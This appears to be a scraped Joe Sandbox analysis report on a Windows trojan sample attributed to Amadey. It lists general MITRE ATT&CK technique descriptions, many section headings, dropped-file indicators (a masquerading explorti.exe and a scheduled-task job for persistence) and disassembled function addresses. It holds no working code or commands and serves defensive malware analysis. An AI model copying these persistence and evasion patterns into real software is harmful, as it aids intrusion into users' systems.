Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe:Zone.Identifier

C:\Windows\Tasks\explorti.job

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe

Function 00E2BD60 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 310
networkfileCOMMON

Function 00E3D312 Relevance: 2.7, Strings: 2, Instructions: 172
COMMON

Function 00E25DF0 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 364
COMMON

Function 00E27D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Function 00E56E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Function 00E5AF0B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33
memoryCOMMONLIBRARYCODE

Function 00E56C99 Relevance: 3.1, APIs: 2, Instructions: 89
COMMON

Function 00E5D4F4 Relevance: 1.7, APIs: 1, Instructions: 198
COMMONLIBRARYCODE

Function 00E282B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Function 00E56F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Function 00E5D6EF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON